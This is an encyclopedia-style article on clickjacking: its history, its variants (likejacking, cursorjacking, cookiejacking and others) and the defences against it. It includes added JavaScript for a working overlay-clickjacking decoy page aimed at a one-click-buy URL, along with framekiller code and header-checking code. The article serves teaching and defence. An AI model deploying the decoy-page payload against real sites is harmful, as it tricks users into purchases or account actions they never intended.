Clickjacking


In a clickjacking attack, the user is presented with a false interface, where their input is applied to something they cannot see.

Clickjacking (classified as a user interface redress attack or UI redressing) is a malicious technique of tricking a user into clicking on something different from what the user perceives, thus potentially revealing confidential information or allowing others to take control of their computer while clicking on seemingly innocuous objects, including web pages. [1] [2] [3] [4] [5]


Clickjacking is an instance of the confused deputy problem, wherein a computer is tricked into misusing its authority. [6]

History

In 2002, it had been noted that it was possible to load a transparent layer over a web page and have the user's input affect the transparent layer without the user noticing. [7] However, fixes only started to trickle in around 2004, [8] and the general problem was mostly ignored as a major issue until 2008. [7]

In 2008, Jeremiah Grossman and Robert Hansen (of SecTheory) discovered that Adobe Flash Player could be clickjacked, allowing an attacker to gain access to a user's computer (for example, its webcam and microphone settings) without the user's knowledge. [7] Grossman and Hansen coined the term "clickjacking", [9] a portmanteau of the words "click" and "hijacking". [7]

As more attacks of a similar nature were discovered, the focus of the term "UI redressing" was changed to describe the category of these attacks, rather than just clickjacking itself. [7]

Description

One form of clickjacking takes advantage of the way applications or web pages compose visual layers, letting the attacker route the user's clicks into an interface the user cannot see.

For example, a clickjacked page tricks a user into performing undesired actions by clicking on concealed controls. The attacker loads the target page over (or under) a decoy page in a transparent layer, so that the outcome of a click is not what the user expects. Unsuspecting users think that they are clicking visible buttons, while they are actually clicking buttons on the invisible page beneath the decoy. The hidden page may be one on which the user is already authenticated; the attacker can therefore trick the user into performing actions which the user never intended. Such actions are hard to attribute to the attacker afterwards, because the requests were issued by the genuinely authenticated user's browser and are indistinguishable from legitimate ones in the target's logs.

Clickjacking categories

Classic

Classic clickjacking refers to a situation when an attacker uses hidden layers on web pages to manipulate the actions a user's cursor does, resulting in misleading the user about what truly is being clicked on. [18]

A user might receive an email with a link to a video about a news item, but another web page, say a product page on Amazon, can be loaded invisibly over the "PLAY" button of the news video. The user tries to "play" the video but actually "buys" the product from Amazon. The attacker gets only a single click, so the attack relies on the visitor being both logged into Amazon and having 1-click ordering enabled.

While technical implementation of these attacks may be challenging due to cross-browser incompatibilities, a number of tools such as BeEF or Metasploit Project offer almost fully automated exploitation of clients on vulnerable websites. Clickjacking may be facilitated by – or may facilitate – other web attacks, such as XSS. [19] [20]
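The following is an added example, not code from the article or from any of the tools it mentions: a small generator for the attacker's decoy page in a classic overlay clickjack. The target URL, button coordinates and decoy label are hypothetical. The only thing it computes is where to position the transparent iframe so that the victim's real button lands exactly under the visible decoy; the CSS shows the three properties the technique depends on (absolute positioning, zero opacity, and a z-index that puts the invisible frame above the decoy so it receives the click).

```javascript
// Added example (not from the article). Builds a proof-of-concept decoy page for an
// overlay clickjack. All URLs and coordinates below are hypothetical/constructed.

// Both rectangles are {x, y} in CSS pixels: the decoy relative to the attacker page,
// the target button relative to the framed document's own viewport. Shifting the
// iframe by the difference puts the real button directly under the decoy.
function iframeOffset(decoyButton, targetButton) {
  return { left: decoyButton.x - targetButton.x, top: decoyButton.y - targetButton.y };
}

function buildClickjackPage({ targetUrl, targetButton, decoyButton, decoyLabel }) {
  const { left, top } = iframeOffset(decoyButton, targetButton);
  return `<!doctype html>
<html><head><meta charset="utf-8"><title>Breaking news video</title>
<style>
  /* The visible decoy the victim believes they are clicking. */
  #decoy  { position:absolute; left:${decoyButton.x}px; top:${decoyButton.y}px;
            width:${decoyButton.w}px; height:${decoyButton.h}px; z-index:1; }
  /* The real target: shifted so its button sits under the decoy, fully transparent,
     and stacked ABOVE the decoy so it, not the decoy, receives the click. */
  #target { position:absolute; left:${left}px; top:${top}px;
            width:1200px; height:900px; opacity:0; z-index:2; border:0; }
</style></head>
<body>
  <button id="decoy">${decoyLabel}</button>
  <iframe id="target" src="${targetUrl}" scrolling="no"></iframe>
</body></html>`;
}

// Constructed scenario: the target's "Buy now" button is at (520, 610) in its own
// viewport; the decoy "PLAY" button is drawn at (300, 200) on the attacker page.
function demoPage() {
  return buildClickjackPage({
    targetUrl: "https://shop.example/one-click-buy?item=123",   // hypothetical target
    targetButton: { x: 520, y: 610 },
    decoyButton: { x: 300, y: 200, w: 160, h: 48 },
    decoyLabel: "PLAY",
  });
}
```

Saving the output of `demoPage()` to an HTML file and opening it shows the decoy; the click lands in the iframe. A target that serves `X-Frame-Options: DENY` or `Content-Security-Policy: frame-ancestors 'none'` (see Prevention below) renders nothing in the iframe, which is the quickest way to verify a fix.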

Likejacking

Likejacking is a malicious technique of tricking users viewing a website into "liking" a Facebook page or other social media posts/accounts that they did not intentionally mean to "like". [21] The term "likejacking" came from a comment posted by Corey Ballou in the article How to "Like" Anything on the Web (Safely), [22] which is one of the first documented postings explaining the possibility of malicious activity regarding Facebook's "like" button. [23]

According to an article in IEEE Spectrum , a solution to likejacking was developed at one of Facebook's hackathons. [24] A "Like" bookmarklet is available that avoids the possibility of likejacking present in the Facebook like button. [25]

Nested

Nested clickjacking, compared to classic clickjacking, works by inserting a malicious frame between two frames of the original, harmless web page: the framed (target) document and the top-level window that displays it. It exploits a weakness in early implementations of the X-Frame-Options header: with the value SAMEORIGIN, some browsers compared only the origin of the framed document with that of the top-level window, and did not look at the intermediate frames. An attacker who can get a frame of their own loaded somewhere between those two layers is therefore not detected and can redress the target's interface from inside the target's own top-level page.

In the past, with Google+ and this faulty version of the X-Frame-Options check, attackers were able to insert frames of their choice by using a weakness in Google's Image Search. Between the image display frames, which were also present in Google+, these attacker-controlled frames loaded without restriction, allowing the attackers to mislead whoever came upon the image display page. [13]

Cursorjacking

CursorJacking is a UI redressing technique to change the cursor from the location the user perceives, discovered in 2010 by Eddy Bordi, a researcher at vulnerability.fr. [26] Marcus Niemietz demonstrated this with a custom cursor icon, and in 2012 Mario Heiderich did so by hiding the cursor. [27]

Jordi Chancel, a researcher at Alternativ-Testing.fr, discovered a CursorJacking vulnerability using Flash, HTML and JavaScript code in Mozilla Firefox on Mac OS X systems (fixed in Firefox 30.0) which can lead to arbitrary code execution and webcam spying. [28]

A second CursorJacking vulnerability was again discovered by Jordi Chancel in Mozilla Firefox on Mac OS X systems (fixed in Firefox 37.0) using once again Flash, HTML and JavaScript code which can also lead to spying via a webcam and the execution of a malicious addon, allowing the execution of malware on the affected user's computer. [29]

MouseJack

Different from the other clickjacking techniques, which redress a user interface, MouseJack is a wireless, hardware-based input vulnerability first reported by Marc Newlin of Bastille in 2016. It allows an attacker within radio range to inject keystrokes into vulnerable USB dongles of wireless mice and keyboards, because the proprietary radio protocols they use do not adequately authenticate the input. [30] Logitech supplied firmware patches, but other manufacturers failed to respond to the vulnerability. [31]

Browserless

In Browserless clickjacking, attackers utilize vulnerabilities in programs to replicate classic clickjacking in them, without being required to use the presence of a web browser.

This method of clickjacking is mainly seen on mobile devices, Android in particular, because of the way toast notifications work. There is a short delay between the moment a toast notification is requested and the moment it actually appears on screen, and attackers can use that gap to place a dummy button hidden underneath the notification that still receives the user's tap. [7]

CookieJacking

CookieJacking is a form of clickjacking in which cookies are stolen from the victim's web browser. The user is tricked into dragging an object that appears harmless, but the drag actually selects the contents of a targeted cookie and drops them into an attacker-controlled page. From there, the attacker can read the cookie and all of the data it carries, such as a session identifier. [15]

FileJacking

In filejacking, attackers abuse the web browser's ability to read files from the user's computer in order to acquire personal data. The user is tricked into selecting a folder in the browser's file and folder selection dialog; once the selection is made, the attacker's page can read the files in that folder and upload them, effectively turning the victim's browser into a file server for the attacker. [16]

Password manager attack

A 2014 paper from researchers at Carnegie Mellon University found that while browsers refuse to autofill if the protocol of the current login page differs from the protocol in use when the password was saved, some password managers would insecurely fill in passwords for the HTTP version of a site whose password had been saved over HTTPS. Most managers did not protect against iframe- and redirection-based attacks, and exposed additional passwords where password synchronization had been used between multiple devices. [17]

Prevention

Client-side

NoScript

Protection against clickjacking (including likejacking) can be added to Mozilla Firefox desktop and mobile [32] versions by installing the NoScript add-on: its ClearClick feature, released on 8 October 2008, prevents users from clicking on invisible or "redressed" page elements of embedded documents or applets. [33] According to Google's "Browser Security Handbook" from 2008, NoScript's ClearClick is a "freely available product that offers a reasonable degree of protection" against Clickjacking. [34] Protection from the newer cursorjacking attack was added to NoScript 2.2.8 RC1. [27]

GuardedID

GuardedID (a commercial product) includes client-side clickjack protection for users of Internet Explorer without interfering with the operation of legitimate iframes. [35] GuardedID's clickjack protection forces all frames to become visible. GuardedID is paired with the NoClickjack add-on to extend protection to Google Chrome, Mozilla Firefox, Opera and Microsoft Edge.

Gazelle

Gazelle is a Microsoft Research project secure web browser based on IE, that uses an OS-like security model and has its own limited defenses against clickjacking. [36] In Gazelle, a window of different origin may only draw dynamic content over another window's screen space if the content it draws is opaque.

Intersection Observer v2

The Intersection Observer v2 API [37] introduces the concept of tracking the actual "visibility" of a target element as a human being would define it. [38] This allows a framed widget to detect when it is being covered: the widget observes itself with the trackVisibility option enabled (which also requires a delay of at least 100 ms between notifications), and each observation entry then carries an isVisible flag that is false when the element is occluded, transformed, or rendered with reduced opacity. The feature is enabled by default since Google Chrome 74, released in April 2019. [39] The API is also implemented by other Chromium-based browsers, such as Microsoft Edge and Opera.

Server-side

Framekiller

Web site owners can protect their users against UI redressing (frame based clickjacking) on the server side by including a framekiller JavaScript snippet in those pages they do not want to be included inside frames from different sources. [34]

Such JavaScript-based protection is not always reliable. This is especially true on Internet Explorer, [34] where this kind of countermeasure can be circumvented "by design" by including the targeted page inside an `<iframe security="restricted">` element, which disables scripting in the framed document. [40] More generally, any framing context in which the attacker can suppress script execution or cancel the top-level navigation defeats a framekiller that relies on navigating away.
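Two framekiller variants, as an added example that is not from the article or from the Browser Security Handbook it cites. The functions take a window-like and document-like object as parameters so the logic can be exercised outside a browser; in a real page they would be called with the global `window` and `document`. The first is the classic 2008-era snippet, which fails open if the attacker can block the navigation. The second follows the fail-closed pattern later recommended in OWASP's Clickjacking Defense Cheat Sheet: the body starts hidden and is revealed only when the page proves it is not framed. The mock objects at the bottom are constructed here purely so the example runs under Node.

```javascript
// Added example (not from the article). Framekiller logic against injectable
// window/document objects. Function names and the mock objects are hypothetical.

// Legacy framekiller: escape the frame by navigating the top window.
// Weak: if the attacker suppresses script (IE's <iframe security="restricted">,
// a sandboxed iframe) or cancels the navigation, the page stays framed and clickable.
function legacyFramekiller(win) {
  if (win.top !== win.self) {
    win.top.location = win.self.location;
    return "busted";
  }
  return "ok";
}

// Hardened variant: hide the document first, reveal only when provably unframed.
// A blocked script or refused navigation now leaves a blank page, not a clickable one.
function hardenedFramekiller(win, doc) {
  const style = doc.createElement("style");
  style.id = "antiClickjack";
  style.textContent = "body{display:none !important;}";
  doc.head.appendChild(style);

  if (win.self === win.top) {
    const s = doc.getElementById("antiClickjack");   // not framed: unhide
    s.parentNode.removeChild(s);
    return "visible";
  }
  try {                                                // framed: stay hidden, try to escape
    win.top.location = win.self.location;
  } catch (e) {
    // Cross-origin top windows may refuse the navigation; we remain hidden regardless.
  }
  return "hidden";
}

// --- Constructed stand-ins for window/document so this runs under Node -------------
function makeDocument() {
  const nodes = [];
  const head = {
    appendChild(n) { n.parentNode = head; nodes.push(n); },
    removeChild(n) { nodes.splice(nodes.indexOf(n), 1); },
  };
  return {
    head,
    createElement(tag) { return { tag, id: "", textContent: "", parentNode: null }; },
    getElementById(id) { return nodes.find(n => n.id === id) || null; },
    hidingRules() { return nodes.filter(n => n.textContent.includes("display:none")).length; },
  };
}

function makeWindow({ framed, topLocation = "https://attacker.example/decoy" }) {
  const self = { location: "https://target.example/transfer" };     // hypothetical target page
  const top = framed ? { location: topLocation } : self;
  return { self, top };
}

// Runs the hardened variant in a framed and an unframed context and reports the outcome.
function demo() {
  const framedWin = makeWindow({ framed: true });
  const framedDoc = makeDocument();
  const framedResult = hardenedFramekiller(framedWin, framedDoc);

  const plainWin = makeWindow({ framed: false });
  const plainDoc = makeDocument();
  const plainResult = hardenedFramekiller(plainWin, plainDoc);

  return {
    framedResult,                                    // "hidden"
    framedStillHidden: framedDoc.hidingRules() === 1,
    framedTopNowAt: framedWin.top.location,          // navigated to the target itself
    plainResult,                                     // "visible"
    plainStillHidden: plainDoc.hidingRules() === 1,
  };
}
```

The hardened form only helps where the framekiller script actually runs; it does not substitute for the server-side headers described below, which the browser enforces before any of the framed page's script executes.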

X-Frame-Options

X-Frame-Options, a new HTTP response header offering partial protection against clickjacking, was introduced in 2009 in Internet Explorer 8 [41] [42] and adopted by other browsers (Safari, [43] Firefox, [44] Chrome, [45] and Opera [46] ) shortly afterwards. The header, when set by the website owner, declares the page's framing policy: DENY forbids all framing, SAMEORIGIN allows framing only by pages of the same origin, and ALLOW-FROM origin allows framing only by the one specified origin. ALLOW-FROM was never implemented by all browsers (Chrome and Safari, for instance, ignore it, and a browser that does not recognise the value treats the header as absent), so sites that need an allow-list of framing origins should use the frame-ancestors directive described below. In addition, some advertising sites return a non-standard ALLOWALL value with the intention of allowing their content to be framed on any page, which is equivalent to not setting X-Frame-Options at all.

In 2013 the X-Frame-Options header was published as RFC 7034, [47] an Informational RFC rather than an Internet Standard: the document records existing browser behaviour for informational purposes only. The W3C's Content Security Policy Level 2 Recommendation provides an alternative security directive, frame-ancestors, which is intended to obsolete the X-Frame-Options header. [48]

A security header like X-Frame-Options will not protect users against clickjacking attacks that are not using a frame. [49]

Content Security Policy

The frame-ancestors directive of Content Security Policy (introduced in the CSP 1.1 drafts that became Level 2) allows or disallows embedding of the page by potentially hostile pages using iframe, frame, object, embed, and similar elements. Unlike X-Frame-Options, it is checked against every ancestor in the frame chain, not just the top-level window, and it accepts a list of permitted origins. This directive obsoletes the X-Frame-Options header; if a page is served with both headers, the browser should enforce the frame-ancestors policy and ignore X-Frame-Options, [50] although some popular browsers have not followed this requirement. [51] Serving both is still advisable so that older browsers without CSP Level 2 support get at least the X-Frame-Options protection.

Example frame-ancestors policies:

# Disallow embedding. All iframes etc. will be blank, or contain a browser-specific error page.
Content-Security-Policy: frame-ancestors 'none'

# Allow embedding of own content only.
Content-Security-Policy: frame-ancestors 'self'

# Allow specific origins to embed this content.
Content-Security-Policy: frame-ancestors www.example.com www.wikipedia.org
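The decision procedure behind the two headers, written out as an added example that is not from the article or from any browser's source. It applies the CSP Level 2 frame-ancestors rules first and falls back to RFC 7034 X-Frame-Options, and it also reproduces the top-window-only SAMEORIGIN check described in the Nested clickjacking section above, so the difference between the two is visible on the same input. Function names are hypothetical, the host/port/scheme matching is a simplification of the CSP source-expression algorithm, and the origins in the scenario are constructed.

```javascript
// Added example (not from the article). `ancestors` lists the origins of the embedding
// chain from the immediate parent up to the top-level window; an empty list means the
// document is not framed. Names and scenario origins are hypothetical.

function parseOrigin(origin) {
  const u = new URL(origin);
  const scheme = u.protocol.slice(0, -1).toLowerCase();
  const port = u.port || (scheme === "https" ? "443" : "80");
  return { scheme, host: u.hostname.toLowerCase(), port };
}

function sameOrigin(a, b) {
  return a.scheme === b.scheme && a.host === b.host && a.port === b.port;
}

// One CSP source expression ('self', "https:", host[:port], *.host) against one ancestor.
function sourceMatches(source, ancestor, self) {
  if (source === "'self'") return sameOrigin(ancestor, self);
  if (/^[a-z][a-z0-9+.-]*:$/i.test(source)) {                 // scheme-source, e.g. "https:"
    return ancestor.scheme === source.slice(0, -1).toLowerCase();
  }
  const m = /^(?:([a-z][a-z0-9+.-]*):\/\/)?(\*\.)?([^/:*\s]+)(?::(\d+|\*))?$/i.exec(source);
  if (!m) return false;                                        // malformed: matches nothing
  const [, scheme, wildcard, host, port] = m;
  const schemeOk = scheme
    ? scheme.toLowerCase() === ancestor.scheme
    : ancestor.scheme === self.scheme || (self.scheme === "http" && ancestor.scheme === "https");
  const hostOk = wildcard
    ? ancestor.host.endsWith("." + host.toLowerCase())
    : ancestor.host === host.toLowerCase();
  const portOk = port
    ? port === "*" || port === ancestor.port
    : ancestor.port === (ancestor.scheme === "https" ? "443" : "80");   // simplified default-port rule
  return schemeOk && hostOk && portOk;
}

// CSP: every ancestor in the chain must match some source, so an attacker frame nested
// under a same-origin top window still fails.
function frameAncestorsAllows(value, ancestors, self) {
  const sources = value.trim().split(/\s+/).filter(Boolean);
  if (sources.length === 0 || sources[0].toLowerCase() === "'none'") return false;
  return ancestors.every(a => sources.some(s => sourceMatches(s, parseOrigin(a), self)));
}

// X-Frame-Options. legacyTopOnly reproduces the behaviour behind nested clickjacking:
// SAMEORIGIN compared only the top-level window's origin and ignored intermediate frames.
function xfoAllows(value, ancestors, self, legacyTopOnly = false) {
  const v = value.trim();
  const checked = legacyTopOnly ? ancestors.slice(-1) : ancestors;
  const upper = v.toUpperCase();
  if (upper === "DENY") return false;
  if (upper === "SAMEORIGIN") return checked.every(a => sameOrigin(parseOrigin(a), self));
  if (upper.startsWith("ALLOW-FROM")) {
    const allowed = parseOrigin(v.slice("ALLOW-FROM".length).trim());
    return checked.every(a => sameOrigin(parseOrigin(a), allowed));
  }
  return true;                                                 // ALLOWALL or unknown: no effect
}

// headers: object with lower-case header names. CSP frame-ancestors, when present,
// takes precedence and X-Frame-Options is ignored, as CSP Level 2 requires.
function framingAllowed(headers, ancestors, selfOrigin, { legacyTopOnly = false } = {}) {
  if (ancestors.length === 0) return true;
  const self = parseOrigin(selfOrigin);
  const csp = headers["content-security-policy"];
  if (csp) {
    const fa = csp.split(";").map(d => d.trim()).find(d => /^frame-ancestors\b/i.test(d));
    if (fa) return frameAncestorsAllows(fa.slice("frame-ancestors".length), ancestors, self);
  }
  const xfo = headers["x-frame-options"];
  return xfo ? xfoAllows(xfo, ancestors, self, legacyTopOnly) : true;
}

// Constructed nested-clickjacking scenario: the attacker's frame sits between the
// target's own top-level page and the sensitive target document.
function nestedScenario() {
  const ancestors = ["https://attacker.example", "https://target.example"];
  const self = "https://target.example";
  return {
    legacyXfo: framingAllowed({ "x-frame-options": "SAMEORIGIN" }, ancestors, self, { legacyTopOnly: true }),
    modernXfo: framingAllowed({ "x-frame-options": "SAMEORIGIN" }, ancestors, self),
    csp: framingAllowed({ "content-security-policy": "frame-ancestors 'self'" }, ancestors, self),
  };
}
```

`nestedScenario()` returns `legacyXfo: true` (the top-only check lets the attacker's intermediate frame through), and `false` for both the full-chain X-Frame-Options check and frame-ancestors 'self'. The same function is handy in a test suite for verifying that a deployment's headers behave as intended before relying on them.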


References

  1. Robert McMillan (17 September 2008). "At Adobe's request, hackers nix 'clickjacking' talk". PC World. Archived from the original on 17 July 2015. Retrieved 8 October 2008.
  2. Megha Dhawan (29 September 2008). "Beware, clickjackers on the prowl". The Times of India. Archived from the original on 24 July 2009. Retrieved 8 October 2008.
  3. Dan Goodin (7 October 2008). "Net game turns PC into undercover surveillance zombie". The Register. Retrieved 8 October 2008.
  4. Fredrick Lane (8 October 2008). "Web Surfers Face Dangerous New Threat: 'Clickjacking'". newsfactor.com. Archived from the original on 13 October 2008. Retrieved 8 October 2008.
  5. Shahriar, Hossain; Devendran, Vamshee Krishna (4 July 2014). "Classification of Clickjacking Attacks and Detection Techniques". Information Security Journal: A Global Perspective. 23 (4–6): 137–147. doi:10.1080/19393555.2014.931489. ISSN 1939-3555. S2CID 43912852.
  6. The Confused Deputy rides again!, Tyler Close, October 2008
  7. Niemietz, Marcus (2012). "UI Redressing Attacks on Android Devices" (PDF). Black Hat.
  8. "162020 - pop up XPInstall/security dialog when user is about to click (comment 44)". Mozilla/Firefox bug tracker.
  9. You don't know (click)jack Robert Lemos, October 2008
  11. "Viral clickjacking 'Like' worm hits Facebook users". Naked Security. 31 May 2010. Retrieved 23 October 2018.
  12. "Facebook Worm – "Likejacking"". Naked Security. 31 May 2010. Retrieved 23 October 2018.
  13. Lekies, Sebastian (2012). "On the fragility and limitations of current Browser-provided Clickjacking protection schemes" (PDF). USENIX.
  14. "Wireless Mouse Hacks & Network Security Protection". MOUSEJACK. Retrieved 3 January 2020.
  15. Valotta, Rosario (2011). "Cookiejacking". tentacoloViola – sites.google.com. Archived from the original on 7 August 2019. Retrieved 23 October 2018.
  16. "Filejacking: How to make a file server from your browser (with HTML5 of course)". blog.kotowicz.net. Retrieved 23 October 2018.
  17. "Password Managers: Attacks and Defenses" (PDF). Retrieved 26 July 2015.
  18. Sahani, Rishabh; Randhawa, Sukhchandan (1 December 2021). "Clickjacking: Beware of Clicking". Wireless Personal Communications. 121 (4): 2845–2855. doi:10.1007/s11277-021-08852-y. ISSN 0929-6212. S2CID 239691334.
  19. "The Clickjacking meets XSS: a state of art". Exploit DB. 26 December 2008. Retrieved 31 March 2015.
  20. Krzysztof Kotowicz. "Exploiting the unexploitable XSS with clickjacking" . Retrieved 31 March 2015.
  21. Cohen, Richard (31 May 2010). "Facebook Work – "Likejacking"". Sophos. Archived from the original on 4 June 2010. Retrieved 5 June 2010.
  22. Ballou, Corey (2 June 2010). ""Likejacking" Term Catches On". jqueryin.com. Archived from the original on 5 June 2010. Retrieved 8 June 2010.
  23. Perez, Sarah (2 June 2010). ""Likejacking" Takes Off on Facebook". ReadWriteWeb. Archived from the original on 16 August 2011. Retrieved 5 June 2010.
  24. Kushner, David (June 2011). "Facebook Philosophy: Move Fast and Break Things". IEEE. Archived from the original on 7 June 2011. Retrieved 15 July 2011.
  25. Perez, Sarah (23 April 2010). "How to "Like" Anything on the Web (Safely)". ReadWriteWeb. Retrieved 24 August 2011.
  26. Podlipensky, Paul. "Cursor Spoofing and Cursorjacking". Podlipensky.com. Paul Podlipensky. Archived from the original on 22 November 2017. Retrieved 22 November 2017.
  27. Krzysztof Kotowicz (18 January 2012). "Cursorjacking Again". Retrieved 31 January 2012.
  28. "Mozilla Foundation Security Advisory 2014-50". Mozilla. Retrieved 17 August 2014.
  29. "Mozilla Foundation Security Advisory 2015-35". Mozilla. Retrieved 25 October 2015.
  30. "What is MouseJack!". Bastille. Retrieved 3 January 2020.
  31. "CERT VU#981271 Multiple wireless keyboard/mouse devices use an unsafe proprietary wireless protocol". kb.cert.org. Retrieved 3 January 2020.
  32. Giorgio Maone (24 June 2011). "NoScript Anywhere". hackademix.net. Retrieved 30 June 2011.
  33. Giorgio Maone (8 October 2008). "Hello ClearClick, Goodbye Clickjacking". hackademix.net. Retrieved 27 October 2008.
  34. Michal Zalewski (10 December 2008). "Browser Security Handbook, Part 2, UI Redressing". Google Inc. Retrieved 27 October 2008.
  35. Robert Hansen (4 February 2009). "Clickjacking and GuardedID ha.ckers.org web application security lab". Archived from the original on 11 July 2012. Retrieved 30 November 2011.
  36. Wang, Helen J.; Grier, Chris; Moschchuk, Alexander; King, Samuel T.; Choudhury, Piali; Venter, Herman (August 2009). "The Multi-Principal OS Construction of the Gazelle Web Browser" (PDF). 18th Usenix Security Symposium, Montreal, Canada. Retrieved 26 January 2010.
  37. "Intersection Observer – W3C Editor's Draft".
  38. "Trust is Good, Observation is Better".
  39. "De-anonymization via Clickjacking in 2019".
  40. Giorgio Maone (27 October 2008). "Hey IE8, I Can Has Some Clickjacking Protection". hackademix.net. Retrieved 27 October 2008.
  41. Eric Lawrence (27 January 2009). "IE8 Security Part VII: ClickJacking Defenses" . Retrieved 30 December 2010.
  42. Eric Lawrence (30 March 2010). "Combating ClickJacking With X-Frame-Options" . Retrieved 30 December 2010.
  43. Ryan Naraine (8 June 2009). "Apple Safari jumbo patch: 50+ vulnerabilities fixed". Archived from the original on 12 June 2009. Retrieved 10 June 2009.
  44. "The X-Frame-Options response header". Mozilla Developer Center. https://developer.mozilla.org/en/The_X-FRAME-OPTIONS_response_header. Archived 7 October 2010 at the Wayback Machine.
  45. Adam Barth (26 January 2010). "Security in Depth: New Security Features" . Retrieved 26 January 2010.
  46. "Web specifications support in Opera Presto 2.6". 12 October 2010. Archived from the original on 14 January 2012. Retrieved 22 January 2012.
  47. "HTTP Header Field X-Frame-Options". IETF. 2013.
  48. "Content Security Policy Level 2". W3C. 2016.
  49. "lcamtuf's blog: X-Frame-Options, or solving the wrong problem". 10 December 2011.
  50. "Content Security Policy Level 2". w3.org. 2 July 2014. Retrieved 29 January 2015.
  51. "Clickjacking Defense Cheat Sheet" . Retrieved 15 January 2016.